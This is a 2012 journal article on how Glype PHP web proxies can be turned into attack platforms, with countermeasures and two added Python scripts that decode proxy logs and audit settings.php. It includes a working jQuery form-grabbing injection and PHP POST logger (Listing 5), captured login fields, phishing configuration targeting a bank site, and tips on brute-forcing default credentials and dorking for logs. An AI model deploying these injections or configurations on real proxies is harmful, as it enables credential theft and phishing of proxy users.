FEATURE
8
Network Security December 2012
Organisations also need to educate their end users, as security is everyone’s concern. Many data leaks caused by insiders are due to careless, not malicious users. Ensure that employees understand security policies and take the proper security precautions.
About the Author
Bill Morrow is executive chairman and CEO at Quarri Technologies. He has more than 20 years of business foundation and leadership experience. In 2006, he founded CSIdentity Corporation, a wholesale provider of ID theft services across the globe, and served as CEO and chairman of the board into 2011. Previously he founded and served as vice-chairman of the board, director and CEO of Grande Communications. Morrow was the 2010 Ernst & Young Entrepreneur of the Year Award winner for Central Texas.
Abusing Glype proxies: attacks, exploits and defences
Aditya K Sood, Michigan State University, Peter Greko, SecNiche Security Labs, and Richard J Enbody, Michigan State University

Proxies play a critical privacy role because these are widely used for anonymous surfing and identity cloaking on the Internet. In addition, proxies also assist in traffic filtering, traffic management, log auditing, access policies and surfing restricted sites. There are several types of proxies available, but the Glype HTTP proxy is used extensively.1

Glype is an open source proxy written in PHP and is freely available for personal use. It can also be licensed for commercial use, and is available as an add-on for Firefox as Proxilla.2 The basic idea of a web proxy is to download requested web pages, modify them according to a set of proxy rules, and then forward them to the user. By standing between the user and the rest of the web, the proxy can provide some anonymity to the user in addition to other services.

Proxies can also be transformed into attack platforms for exploitation. For example, misconfigured proxies can be exploited by an attacker to steal sensitive information from users. Our study focuses on various attacks and the distribution of malware using Glype proxies. We present a model of the approach used by attackers to transform a Glype proxy into an attack toolkit for spreading infections. For our experiments, we have used Glype versions 1.1 and 1.4. We will present details about the features of Glype proxies that help attackers, and we will conclude by proposing countermeasures.

Background
A number of studies have been conducted in the past regarding the use of public proxies as attack platforms. SANS, a co-operative research and security institution, conducted two studies on the integrity of public proxies. The first, by Powers, discussed the possibility of malware in public proxy lists.3 The study focused on tracking the Koobface malware that used open ports for incoming connections and hid operations behind proxies through proxy lists. The other, by Brozycki, presented techniques for detecting proxies that provide anonymous access and proposed methods to defend against them using blacklisting and active monitoring.4 A number of IDS rules were proposed by Brozycki to prevent users from accessing blocked content inside a network. In this paper, we do not cover network-level anonymisers such as VPNs and TOR. The concept of this paper revolves around web-based anonymity using server-side web proxies. The primary difference between the TOR network and web-based proxies is that TOR implements multi-tier (multi-layer) anonymity before forwarding the traffic to the destination, whereas web proxies have a two-tier (single-server) architecture.5 In other words, the difference is in the implementation of relays and routing the traffic between endpoints.
Huang et al. discussed cache-poisoning attacks in transparent proxies using socket Application Programming Interfaces (APIs) in Java and Flash.6 In cache poisoning attacks, transparent proxies are exploited that are configured to route traffic based on the HTTP ‘Host:’ parameter while caching at the same time. An attacker poisons the Host: header in the cache using a malicious Flash or Java file that downloads the policy file from the attacker’s server. Cache poisoning attacks are quite common in network proxies. The Swiss Security Team discussed the inability of Glype proxies to hide the user’s identity entirely.7 Its study showed how the misconfiguration in Glype proxies can lead to the disclosure of sensitive information.
Dissecting Glype
The primary purpose of the Glype proxy is to provide the capability of anonymous surfing. However, attackers can also transform a Glype proxy into a malware infection platform. To understand the attacks, it is important to understand the characteristics of Glype proxies.
To provide proxy services each URL and each page’s internal links are encoded using a simple base-64 encoding. For example, consider this URL:

hxxp://[Glype_proxy_url]/proxy/browse.php?u=Oi8vc2NyaXB0bWFmaWEub3JnLw%3D%3D&b=13&f=norefer

This contains the string ‘Oi8vc2NyaXB0bWFmaWEub3JnLw’. A simple base-64 decoding of this string results in ‘://scriptmafia.org’, which shows that the URL decoding process is simple. Care is needed to handle special characters because the Glype proxy follows the PHP-based encoding/decoding mechanism in which special characters present in variable names are encoded to maintain compatibility with registered global variables.
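The encoded u= parameter above is what a network defender sees in web-server or proxy logs when users reach sites through a Glype proxy. The following Python script is an added example, not code from the article or from Glype: it decodes that parameter from log lines in the three-field layout of Listing 2 and reports the real destination host, tolerating stripped base-64 padding and rejecting values that do not decode. The log lines and the proxy.example host are constructed; only the first encoded value is the one quoted above.

```python
import base64
import binascii
from urllib.parse import unquote, urlsplit

# Constructed log lines in the layout of Listing 2 (client IP, timestamp, requested
# URL). proxy.example is a placeholder host. The first 'u' value is the one quoted
# in the article; the second encodes https://m.facebook.com/login.php without
# padding; the third is deliberately not base64; the fourth is not a proxied request.
SAMPLE_LOG = """\
10.0.0.5, 07/Mar/2012:21:15:54 -0500, http://proxy.example/proxy/browse.php?u=Oi8vc2NyaXB0bWFmaWEub3JnLw%3D%3D&b=13&f=norefer
10.0.0.5, 07/Mar/2012:21:15:55 -0500, http://proxy.example/proxy/browse.php?u=aHR0cHM6Ly9tLmZhY2Vib29rLmNvbS9sb2dpbi5waHA&b=13
10.0.0.5, 07/Mar/2012:21:16:01 -0500, http://proxy.example/proxy/browse.php?u=%21%21not-base64%21%21&b=13
10.0.0.5, 07/Mar/2012:21:16:02 -0500, http://proxy.example/index.php
"""


def decode_glype_target(proxy_url):
    """Return the destination hidden in a Glype browse.php link, or None.

    The destination travels base64-encoded in the 'u' query parameter and is
    URL-encoded on the wire ('=' padding shows up as %3D). Padding may be missing,
    and the article's sample decodes to '://scriptmafia.org/' with no scheme, so
    the decoded text is returned as-is rather than forced into a URL object.
    """
    parts = urlsplit(proxy_url)
    if not parts.path.endswith("browse.php"):
        return None
    token = None
    for pair in parts.query.split("&"):
        key, _, value = pair.partition("=")
        if key == "u":
            # unquote, not unquote_plus: '+' is a legitimate base64 character
            token = unquote(value).strip()
            break
    if not token:
        return None
    # Restore any stripped '=' padding, then decode strictly; anything outside the
    # base64 alphabet or not printable ASCII is treated as tampered or truncated.
    padded = token + "=" * (-len(token) % 4)
    try:
        text = base64.b64decode(padded, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def destination_host(target):
    """Extract the host from a decoded target, tolerating a missing scheme."""
    if target.startswith("://"):
        target = "http" + target
    elif "://" not in target:
        target = "http://" + target
    return urlsplit(target).hostname


def proxied_destinations(log_text):
    """Map each proxied request in the log to (client_ip, destination_host).

    Lines that are not browse.php requests, or whose 'u' parameter does not
    decode cleanly, are skipped.
    """
    results = []
    for line in log_text.splitlines():
        # Split on the first two commas only: the URL itself may contain commas.
        fields = [f.strip() for f in line.split(",", 2)]
        if len(fields) != 3:
            continue
        client_ip, _timestamp, url = fields
        target = decode_glype_target(url)
        if target is None:
            continue
        results.append((client_ip, destination_host(target)))
    return results


if __name__ == "__main__":
    for ip, host in proxied_destinations(SAMPLE_LOG):
        print(ip, "->", host)
```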
The Glype proxy can be extended using plugins. For example, popular websites such as Facebook, Twitter and Gmail have separate plug-ins for the Glype proxy. Web page processing is handled using Glype’s ‘process.php’ page. For simplicity, the Glype proxy injects JavaScript code in web pages to avoid sending requests to the process.php page using HTTP POST requests. The Glype proxy uses HTTP headers such as ‘Referer:’ and ‘Location:’ for redirection purposes.
Google can be used to search for misconfigured Glype proxies. By default, Glype logs its activities with a log folder in the /tmp directory (/tmp/log). Knowing the location of the log allows a malicious user to easily craft efficient Google queries with Google dorks to search for misconfigured proxies.
The Glype proxy has default credentials {username=admin, password=admin}. The password is hardcoded as an MD5 hash, but is susceptible to brute-force attack. For secure configurations, the hash should be replaced. In addition, in its default configuration, the Glype proxy uses no cache. Listing 1 shows the implementation of the cache module in the Glype proxy. However, it is still possible to configure the Glype proxy to send some cache headers using session_cache_limiter(‘private_no_expire’).

Glype proxies suffer from several design flaws that are exploited by attackers. Some of the issues that make Glype proxies an effective hacker tool are discussed below.
Logging mechanism
By design, the Glype proxy is supposed to provide anonymity for its users. Unfortunately, weaknesses exist that can leak information about a user’s identity. Since Glype is written in PHP, an attacker can perform several modifications to make the Glype proxy a tool for successful execution of attacks. There are different kinds of information that attackers can easily steal by misconfiguring the parameters of the Glype proxy and writing an advanced plugin for capturing data. Listing 2 shows the type of information logged when the user surfs a website through a Glype proxy. It basically captures GET requests and provides information about IP addresses visited.
Glype proxies also allow attackers to extract cookies – a potentially valuable source of personal information. The Glype proxy only provides an option for deleting cookies on the client side, not on the server side. To provide anonymity the cookies should be deleted completely on both sides, but this cannot happen. Listing 3 shows the extracted cookies of a user who visited Facebook.

In an attempt to provide anonymity, a Glype proxy does not log POST requests. However, an attacker can write a plugin to grab all POST requests. We developed such a plugin, which we demonstrate in the next section.

Listing 1: Cache module in the Glype proxy
# Send no-cache headers.
function sendNoCache()
{
    header( 'Cache-Control: no-store, no-cache, must-revalidate' );
    header( 'Cache-Control: post-check=0, pre-check=0', false );
    header( 'Pragma: no-cache' );
}

Listing 2: Logs in Glype Proxy
68.37.xxx.xxx, 07/Mar/2012:21:15:54 -0500, http://m.facebook.com
68.37.xxx.xxx, 07/Mar/2012:21:15:55 -0500, http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/7L0JGfufUnz.png
68.37.xxx.xxx, 07/Mar/2012:21:16:14 -0500, https://m.facebook.com/login.php?m=m&refsrc=http%3A%2F%2Fm.facebook.com%2F&refid=8
68.37.xxx.xxx, 07/Mar/2012:21:16:15 -0500, https://s-static.ak.facebook.com/rsrc.php/v1/yz/r/aKhO2tw3FnO.png
68.37.xxx.xxx, 07/Mar/2012:21:17:03 -0500, http://m.facebook.com/home.php?refsrc=http%3A%2F%2Fm.facebook.com%2F&refid=9&m_sess=1h7Hs5-j9bwiFsu&_rdr
IP banning and restriction
Glype proxies provide impressive functionality to restrict IP addresses using the BlockScript web software.8 It was designed to enable administrators to restrict HTTP requests from unwanted domains. However, this functionality is also useful for launching targeted attacks in which attackers target a specific set of IP addresses and restrict others. Also, this property can subvert the generic analysis method of testing servers remotely. A Glype proxy uses an IP banning module as shown in listing 4.

In the code in listing 4, a Glype proxy looks for IP addresses that are restricted or blacklisted to start the verification check. If an IP address is found in the databases, the Glype proxy returns a ‘403 Forbidden’ response to the user. To make it more malicious, attackers can serve malicious web pages showing the IP-banned message. In this way, a user is not able to surf anonymously and still gets infected. There are many modifications that can be made in the code for playing around with IP address restrictions.
Listing 3: Cookies collected by Glype Proxy
#HttpOnly_.facebook.com TRUE / FALSE 1394475951 datr V4tbT71wsBGdD8j2XZgUBDlJ
.facebook.com TRUE / FALSE 0 lsd 1W12c
#HttpOnly_.facebook.com TRUE / FALSE 0 m_ts 1331403951
.facebook.com TRUE / FALSE 1 reg_ext_ref deleted
.facebook.com TRUE / FALSE 0 reg_fb_gate http%3A%2F%2Fm.facebook.com%2F
.facebook.com TRUE / FALSE 0 reg_fb_ref http%3A%2F%2Fm.facebook.com%2F%2522http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2Fyr%2Fr%2FxgDlevwA9Y5.png%2522
Listing 4: IP Banning Module
if ( empty($_SESSION['ip_verified']) || $_SESSION['ip_verified'] != $_SERVER['REMOTE_ADDR'] ) {
    if (!$CONFIG['enable_blockscript']) {
        # Current IP matches a banned IP? true/false
        $banned = false;
        # Examine all IP bans
        foreach ( $CONFIG['ip_bans'] as $ip ) {
            # Is this a range or single?
            if ( ($pos = strspn($ip, '0123456789.')) == strlen($ip) ) {
                # Just a single IP so check for a match
                if ( $_SERVER['REMOTE_ADDR'] == $ip ) {
                    # Flag the match and break out the loop
                    $banned = true;
                    break;
                }
                # And try next IP
                continue;
            }
            // - - - - - Redacted - - - - - //
        }
        # Is the IP address banned?
        if ( $banned ) {
            # Send a Forbidden header
            header('HTTP/1.1 403 Forbidden', true, 403);
            # Print the banned page and exit!
            echo loadTemplate('banned.page');
            exit;
        }
    }
    # Still here? Must be OK so save IP in session to prevent rechecking next time
    $_SESSION['ip_verified'] = $_SERVER['REMOTE_ADDR'];
}
Threat model
Examining the threat model allows us to understand the role of the various actors involved and how attackers exploit the integrity of users by conducting attacks. The model basically covers the threats associated with end users and administrators. Since we’re concerned here with the Glype proxy, the attacks are modelled around the Man-in-the-Middle (MitM) paradigm.
- Administrators: during our research, it has been noticed that Glype proxies are configured in a very insecure way – for example, using default or weak passwords. This misconfiguration allows attackers to successfully compromise the proxy software using brute-force attacks. The primary risk is that attackers now exploit third-party resources – including infrastructure, traffic density, etc – to exploit users at a large scale. Glype is a server-side proxy and compromising it has serious implications.
- End users: the Glype proxy provides anonymity on the web. The users are susceptible to a wide variety of attacks. The primary target of the attacker is to force the users to surf Internet resources through the Glype proxy. The users’ surfing habits and trust play a significant role in the execution of insidious attacks. Information stealing, phishing, Cross-Frame Scripting (XFS) and so on are some of the attacks that can be triggered easily using a Glype proxy.
Since the Glype proxy is open source, the code can be modified using inherent features that make it a more powerful weapon. In the next section, we discuss some of the attacks using custom plugins. Remember, Glype is not a client-side proxy but it infects and modifies the proxied web pages served to the users.
Launching attacks using Glype
Attacks triggered using Glype proxies are based on the concept of the Man-in-the-Middle (MitM) paradigm. The MitM agent reads and writes the traffic between two end points on the network. It is quite easy to equate the Glype proxy with an MitM agent because the traffic originating from the infected machine is routed through the Glype proxy interface before it is processed by the web server. The attacker controls and administers the Glype proxy interface and can easily manipulate the requests and responses flowing between the client’s browser and the web server. As a result, the user is served with illegitimate and malicious content that subverts the normal operations of browsers. To support this theory, our team conducted several sets of tests to understand the impact of Glype proxy infection at a large scale.
Data exfiltration – form grabbing
Data exfiltration attacks are conducted to steal sensitive information from infected machines on the Internet. It is easy to exfiltrate data from users who use Glype proxies. These proxies provide a configuration file for managing the current run state and it appears possible for an attacker to infect all the proxified web pages with illegitimate content. To test that theory, we conducted an experiment to understand the impact of infecting proxied webpages. We noticed that a Glype proxy provides certain configuration parameters that can be used to inject malicious content that gets rendered in all the web pages that are proxied. This capability can be devastating. We implemented a small program using jQuery to grab all the POST requests. Listing 5 provides the three scripts that we used in our tests, which are described as follows:
- Code (1) is used to serialise the data present in the forms. This code serialises the data entered by the users in input boxes in the forms and submits the data to the malicious domain. This code is passed as a parameter to the ‘footer_include’ configuration, and so injects this code at the bottom of all the proxied webpages.
- Code (2) is the same except that it does not send the form data to the server but rather triggers an alert notification. This code is used for validating successful insertion of scripts in the web pages.
- Code (3) is used to handle the incoming data and store it in the log file for analysis.
By using the code discussed in listing 5, it is possible to log all the POST requests sent by the user’s browser through the Glype proxy’s interface. The POST data can be logged on the server side as shown in listing 6.

Figure 1 shows the successful execution of a script inserted in the proxied web page. This shows that it is very easy to inject scripts automatically by tweaking configuration parameters in the Glype proxy.
Cross-frame scripting and phishing
Cross-Frame Scripting (XFS) is an advanced attack in which an attacker exploits the inability of web pages to prevent themselves from being framed in a web browser. An attacker loads the target website in an HTML iframe or frame and forces the JavaScript from the primary domain to interact with the target website that is loaded in the frame. XFS allows the attackers to force the legitimate user to perform rogue operations without their knowledge. XFS can be launched to trigger phishing attacks. To counter this attack many websites are using anti-XFS code.9 HTML 5 has the built-in attribute ‘sandbox’ defined as a part of an iframe tag that can be used to bypass the restrictions, as described here.10 Despite this fact, a Glype proxy has the ability to rewrite URLs while proxying the content of the domain. A Glype proxy caches the URL and then applies the proxify function to rewrite it. To make it legitimate, an attacker can configure the Glype proxy in such a way that phishing attacks look more original by subverting the XFS protections. We conducted an experiment using Glype proxy version 1.1 and made configuration changes in the settings.php file in order to tweak the Glype proxy to execute a phishing attack. We also modified the code to execute advanced attacks to understand the potential risk associated with a Glype proxy. Listing 7 shows the configuration we used in the demonstration attack code.
In our code, Secure Socket Layer (SSL) protocol warnings are turned off. This modification allows the Glype proxy to quash all the SSL-based warnings. We also enabled hotlinking, the process of directly loading content from a third-party domain. In a Glype proxy, hotlinking allows the attacker to force the user to visit an XFS web page directly. We enabled caching for faster execution. Caching of files such as CSS, images, and so on forces the browser to store the content locally and use it directly without sending requests to the web server. This way, the attacker can speed up the loading of web pages in the client’s browser. Finally, we allowed JavaScript for communication with different objects on the web page. JavaScript is an essential component of many websites and applications. For example, banking websites use JavaScript for communicating with different objects in a dynamic manner. In addition, the attacker benefits from this because it allows the attacker to execute any arbitrary script in the context of a proxied website. We tested this configuration and found that it is possible to use XFS for conducting a phishing attack as shown in Figure 2.

Our experiment showed that sophisticated XFS protections can be circumvented with the help of a Glype proxy. In Figure 2, a legitimate Bank of America website is framed inside a Glype proxy interface without any warnings. It means an attacker can inject scripts as discussed earlier to interact with various objects on the web page. Typically, the user believes that he/she is surfing the bank website through a legitimate proxy but in reality all the information can be easily captured from the user’s session.

“It is possible to embed a single exploit code directly in the Glype proxy web page. This process actually transforms the Glype proxy into an attack toolkit”
In the above layout, the URL points to the domain where the Glype proxy is hosted. As hotlinking is allowed and the Glype proxy does not present any message, the attacker can also use the Glype proxy URL (pointed to the bank domain) and embed it in phishing emails for distribution among a large number of users. When a user clicks the malicious link, he/she is redirected towards the Glype proxy interface that automatically loads the legitimate bank website. An attacker can also install a Glype proxy on familiar-looking domain names to make the phishing attack look more appealing, and hence more effective.

Listing 5: Injecting Code in Glype Proxy Parameter
// - - - - Code (1) - - - - //
$CONFIG['footer_include'] = '<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script>
$("form").submit( function()
{
    var yup = $("form").serialize();
    $.post("logit.php", yup, function (data){});
});
</script>';
// - - - - Code (2) - - - - //
$CONFIG['footer_include'] = '<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>
<script>
$("form").submit( function()
{
    alert( $("form").serialize());
});
</script>';
// - - - - Code (3) - - - - //
<?php
$file = fopen("postlog.txt", 'a');
foreach( $_POST as $key => $value )
{
    fwrite($file, $key.":".$value."\n");
}
fclose($file);
?>

Listing 6: Extracted Data from HTTP POST (FORM Submit) Request
lsd:
post_form_id:7eb4ce3be4f996e756e1f54ac474d578
charset_test:€,´,€,´,水,Д,Є
version:1
ajax:1
width:1280
pxr:1
gps:1
email:FACEBOOK_USER@facebook.com
pass:FACEBOOK_PASSWORD
m_ts:1332258635
li:MqdoT8wNn91Ak0OT4rUUGUHg
Malware distribution
Glype proxies can be used for attacking corporate networks to spread infections. Considering the characteristics of a Glype proxy, it is possible for attackers to create an embedded toolkit using a Glype proxy for distributing malware that is highly targeted. The complete model is presented below.

Hosting Glype proxy: to begin, the attacker hosts the Glype proxy tool on a compromised domain. As described earlier, web searching can reveal a number of misconfigured Glype proxies on the Internet. It is not difficult for an attacker to hack a misconfigured proxy and use it for malicious purposes. Once a proxy is successfully installed on the compromised domain, the attacker configures it for the attack using scenarios described in earlier sections. There are two primary configuration checks that an attacker wants to implement:
- Logging: enables the attacker to keep track of the activity happening through the proxy. For example, an attacker can install a custom POST logger plugin for stealing data in HTTP POST requests.
- IP banning: allows the attacker to restrict certain IP addresses from accessing the Glype proxy. This functionality is useful in targeted infections.
Embedding a browser exploit pack in Glype: after successful installation of a Glype proxy, the next step is to embed an iframe having a URL pointing to a Browser Exploit Pack (BEP).11 The iframe can be hidden or obfuscated depending on the requirements. A BEP is a framework that has a number of exploits bundled together. A BEP begins by fingerprinting the user’s browser environment and then serves an appropriate exploit. BlackHole, Phoenix and Crimepack are some of the BEPs that are frequently used for infections. It is possible to embed a single exploit code directly in the Glype proxy web page. This process actually transforms the Glype proxy into an attack toolkit. As discussed earlier, malicious code can be injected dynamically in all the proxied web pages for stealthy infections. The main motive behind this process is to exploit the user’s browser when a proxied web page is opened. Additionally, many proxy users believe that surfing online anonymously provides security and neglect to verify the integrity of the Glype proxy. An attacker can exploit this trust. Embedding a malicious link pointing to a BEP is not a hard task in the Glype proxy.

Figure 1: Stealing credentials by injecting code in a Glype proxy.

Listing 7: Configuration Parameters Required for Bypassing XFS and Executing Phishing
// Configure SSL warnings
$CONFIG['ssl_warning'] = false;
// Managing Hotlinking
$CONFIG['stop_hotlinking'] = false;
// Specifying the target domain for hot linking
$CONFIG['hotlink_domains'] = array('www.bankofamerica.com');
// Storing cookies on the server
$CONFIG['cookies_on_server'] = true;
// Setting cookies path
$CONFIG['cookies_folder'] = $CONFIG['tmp_dir'] . 'cookies/';
// Enable logging
$CONFIG['enable_logging'] = true;

Figure 2: Phished web page in a Glype proxy.
Advertising Glype proxy: once the Glype proxy-based attack is set up, the next step is to start advertising the Glype proxy. Advertising is usually done to collect revenue based on hits, but in this case the prime motivation for an attacker is to get traffic so that the infectious code can be distributed. However, advertising can play a critical role in the success of attacks. Several methods are used by attackers to advertise their infected Glype proxies:
- Attackers use public proxy lists to advertise their infected Glype proxy. Public proxy lists are one of the most widely accepted methods for advertising Glype proxies. For example, paying a few dollars allows an infected Glype proxy to be numbered in the top-ten proxies, which is a good deal from the attacker’s perspective. This approach can increase traffic on the infected Glype proxy. Figure 3 shows how a proxy can be advertised.
- Attackers use phishing attacks to distribute the URL pointing to their infected Glype proxy. Phishing attacks have been effective for exploiting users’ trust and belief in the security of proxies.
- Attackers advertise the infected proxy on social networks, message boards and advertising links. Due to their popularity and trustworthiness, social networks have become the preferred choice of attackers for distributing malware. It is easy and profitable.
On completion of this process, attackers have successfully distributed information about their infected Glype proxy to a variety of outlets on the Internet. After this, the attacker waits for the infections to trigger.
Post-exploitation: once the infected proxy site has been visited, there are two vectors of attack. If a user is to be directed to a malicious website loaded with malware, the BEP there installs malware on the user’s computer and the computer is owned by the attacker. If the Glype proxy is being used to gather information, the attacker starts mining the logs to track the IP addresses and extract personal information, possibly including account credentials. Information collected from Glype proxies can also be very useful to design other attack vectors. For example, information specific to an individual can be collected for a later, more effective spear-phishing attack. This attack model is typically part of a distributed attack and can be very effective in spreading infections widely.
Proactive steps
There are several steps that users can take when dealing with Glype proxies for anonymous surfing on the Internet:
- Users should avoid using proxy services for surfing websites that require critical information, such as financial credentials, to be delivered to the server. Users should be aware that their data is being transferred through a public proxy. A classic example would be employees circumventing restrictions put in place by an organisation they work for – such circumvention could open a big hole.
- There are legitimate and authentic proxy services on the Internet. However, it is still not advised to use the services directly. A user should verify the integrity of a proxy provider to check whether it is a legitimate service provider or a fraudulent entity.
- If a Glype proxy is deployed for internal use, it should be ensured that the Glype proxy is configured in a secure way. Default credentials must be changed to stronger ones. Log files should not be publicly accessible, which can be achieved by configuring the settings.php and .htaccess files on the server.
- Users should develop good surfing habits on the Internet. For example, they should always think twice before clicking a link that is embedded in an email. Additionally, they should be suspicious of attachments and verify them before downloading. These operational habits depend on the security knowledge of the user and show the importance of user education. Organisations should have a robust security training model to educate users about the latest web attack trends and appropriate secure behaviour.
The steps discussed above can be effective in reducing the infection rate and preserving the integrity of users.
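The secure-configuration step above, and the default-credential and logging weaknesses described under Dissecting Glype, can be checked mechanically. The following Python audit is an added example, not code from the article or from Glype: it parses $CONFIG assignments from a settings.php and flags the settings this article associates with abuse (logging on, SSL warnings off, hotlinking allowed, cookies kept on the server, a script injected through footer_include, and a password stored as the MD5 of a default such as ‘admin’), then shows the same keys with defensive values. Both settings fragments are constructed, and the admin_pass key name is an assumption; the hash check matches on value, not on key name.

```python
import hashlib
import re

# MD5 of a few default passwords. The article notes Glype ships with admin/admin and
# stores the password as an MD5 hash, so a default hash in the file is a finding.
DEFAULT_PASSWORD_HASHES = {
    hashlib.md5(p.encode()).hexdigest(): p for p in ("admin", "password", "glype")
}

# One assignment per line: $CONFIG['key'] = <value>;  (value runs to the final ';')
ASSIGN_RE = re.compile(
    r"""^\s*\$CONFIG\[\s*['"](\w+)['"]\s*\]\s*=\s*(.+?)\s*;\s*$""", re.MULTILINE
)

_ADMIN_MD5 = hashlib.md5(b"admin").hexdigest()
_STRONG_MD5 = hashlib.md5(b"correct horse battery staple").hexdigest()

# Constructed settings.php fragment mirroring Listing 7 plus an injected footer from
# Listing 5. 'admin_pass' is an assumed key name used only to place the hash.
WEAK_SETTINGS = f"""<?php
$CONFIG['tmp_dir'] = '/tmp/';
$CONFIG['ssl_warning'] = false;
$CONFIG['stop_hotlinking'] = false;
$CONFIG['hotlink_domains'] = array('bank.example');
$CONFIG['cookies_on_server'] = true;
$CONFIG['cookies_folder'] = $CONFIG['tmp_dir'] . 'cookies/';
$CONFIG['enable_logging'] = true;
$CONFIG['admin_pass'] = '{_ADMIN_MD5}';
$CONFIG['footer_include'] = '<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5/jquery.min.js"></script>';
"""

# The same keys with the values a defender would want (also constructed).
HARDENED_SETTINGS = f"""<?php
$CONFIG['tmp_dir'] = '/tmp/';
$CONFIG['ssl_warning'] = true;
$CONFIG['stop_hotlinking'] = true;
$CONFIG['hotlink_domains'] = array();
$CONFIG['cookies_on_server'] = false;
$CONFIG['enable_logging'] = false;
$CONFIG['admin_pass'] = '{_STRONG_MD5}';
$CONFIG['footer_include'] = '';
"""


def parse_config(text):
    """Return {key: raw PHP value text} for every $CONFIG assignment in the file."""
    return {m.group(1): m.group(2) for m in ASSIGN_RE.finditer(text)}


def php_literal(raw):
    """Convert a scalar PHP literal: true/false, a quoted string, else the raw text."""
    if raw.lower() == "true":
        return True
    if raw.lower() == "false":
        return False
    if len(raw) >= 2 and raw[0] == raw[-1] and raw[0] in "'\"":
        return raw[1:-1]
    return raw


def audit(text):
    """Return (key, finding) pairs for the settings the article links to abuse."""
    cfg = {k: php_literal(v) for k, v in parse_config(text).items()}
    findings = []
    if cfg.get("enable_logging") is True:
        findings.append(("enable_logging", "visited URLs and client IPs are written to the log folder"))
    if cfg.get("ssl_warning") is False:
        findings.append(("ssl_warning", "SSL warnings suppressed; users get no signal of certificate problems"))
    if cfg.get("stop_hotlinking") is False:
        findings.append(("stop_hotlinking", "hotlinking allowed; proxied pages can be linked to directly"))
    if cfg.get("cookies_on_server") is True:
        findings.append(("cookies_on_server", "cookies stored server-side in the cookies folder"))
    footer = cfg.get("footer_include", "")
    if isinstance(footer, str) and re.search(r"<script|<iframe", footer, re.IGNORECASE):
        findings.append(("footer_include", "script or iframe injected into every proxied page"))
    # Any string value equal to the MD5 of a default password, whatever its key name.
    for key, value in cfg.items():
        if isinstance(value, str) and value.lower() in DEFAULT_PASSWORD_HASHES:
            findings.append((key, "MD5 of default password %r" % DEFAULT_PASSWORD_HASHES[value.lower()]))
    return findings


if __name__ == "__main__":
    for key, why in audit(WEAK_SETTINGS):
        print("%-18s %s" % (key, why))
    print("hardened findings:", audit(HARDENED_SETTINGS))
```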
Conclusion
Glype proxies have been increasing in popularity over the past few years. Generally, Glype proxies assist in maintaining a user’s integrity and privacy. However, they can also be used as an attack platform because of some inherent design flaws. First, insecure configuration of Glype proxies can result in the stealing of information. Second, attackers can extend the Glype proxy code to conduct web-based attacks by tricking a user to visit a malicious domain or routing the web traffic through Glype proxies. Finally, security greatly depends on users’ ability to make secure decisions when on the Internet. Secure behaviour can help thwart a number of attack scenarios. Be vigilant and surf securely.

Figure 3: Advertising proxies on the Internet.
About the authors
Aditya K Sood is a senior security practitioner and PhD candidate at Michigan State University. He has already worked in the security domain for Armorize, COSEINC and KPMG. He is also a founder of SecNiche Security, an independent security research lab. He has been an active speaker at industry conferences such as DEFCON, HackInTheBox, LayerOne, Source, RSA, BruCon, ToorCon, HackerHalted, TRISC, EuSecwest, XCON, Troopers, OWASP AppSec, US-CERT GFIRST and many others. He has authored several papers for various publishers including IEEE, Elsevier, Crosstalk, Virus Bulletin, ISACA, ISSA and HITB.

Peter Greko is a security researcher at SecNiche Security Labs where he deals with cyber-security issues. Previously he has worked in the cyber-security divisions of Sypris and Citigroup. He has spoken at several conferences, including HackerHalted, AppSec DC, HOPE, Swiss CyberStorm and local OWASP and ISSA chapter meetings.

Richard J Enbody, PhD is associate professor in the Department of Computer Science and Engineering at Michigan State University (US) where he joined the faculty in 1987. He earned his PhD at the University of Minnesota (1987) and his BA at Carleton College (1976). His research interests include computer security, computer architecture, web-based distance education, and CS1 education. Enbody has written a CS1 text using Python: ‘The Practice of Computing Using Python, Second Edition’, published by Addison-Wesley 2012.
References
1. Glype proxy. Accessed Nov 2012. www.glype.com.
2. Proxilla Glype Proxy Client – Mozilla Firefox Add-On. Accessed Nov 2012. https://addons.mozilla.org/en-US/firefox/addon/proxilla/.
3. Powers, JL. ‘Tracking Malware with Public Proxy Lists’. SANS Reading Room. Accessed Nov 2012. www.sans.org/reading_room/whitepapers/malicious/tracking-malware-public-proxy-lists_33604.
4. Brozycki, Z. ‘Detecting and Preventing Anonymous Proxy Usage’. SANS Reading Room. Accessed Nov 2012. www.sans.org/reading_room/whitepapers/detection/detecting-preventing-anonymous-proxy-usage_32943.
5. ‘TOR (The Onion Router)’. University of Michigan. Accessed Nov 2012. http://webapps.lsa.umich.edu/lsait/admin/TOR%20Routing%20Infomation%20.pdf.
6. Huang, L; Chen, EY; Barth, A; Rescorla, E; Jackson, C. ‘Talking to Yourself for Fun and Profit’. Accessed Nov 2012. www.w2spconf.com/2011/papers/websocket.pdf.
7. ‘When You Think You Surf Anonymously But You Don’t’. Swiss Security Blog, 26 Apr 2010. Accessed Nov 2012. www.abuse.ch/?p=2534.
8. BlockScript, home page. Accessed Nov 2012. www.blockscript.com.
9. Rydstedt, G; Bursztein, E; Boneh, D; Jackson, C. ‘Busting Frame Busting: a Study of Clickjacking Vulnerabilities on Popular Sites’. Stanford SecLab, 20 Jul 2010. Accessed Nov 2012. http://seclab.stanford.edu/websec/framebusting/framebust.pdf.
10. Sood, AK; Enbody, RJ. ‘Frametrapping the framebusting defence’. Network Security, October 2011. Accessed Nov 2012. www.sciencedirect.com/science/article/pii/S1353485811701052.
11. Sood, AK; Enbody, RJ. ‘Browser Exploit Packs – Exploitation Tactics’. ToorCon Security Conference, October 2011, San Diego. Accessed Nov 2012. http://secniche.blogspot.com/2011/06/toorcon-seattle-2011-browser-exploit.html.
Virtual jihad: how real is the threat?

Steve Gold, freelance journalist

There is widespread concern about the ways in which terrorist organisations – and particularly jihadist movements – may be using the Internet to organise and execute acts of terror. But is the threat real, or is it a case of the IT security industry generating fear, uncertainty and doubt in an attempt to instil fear into every Internet user?

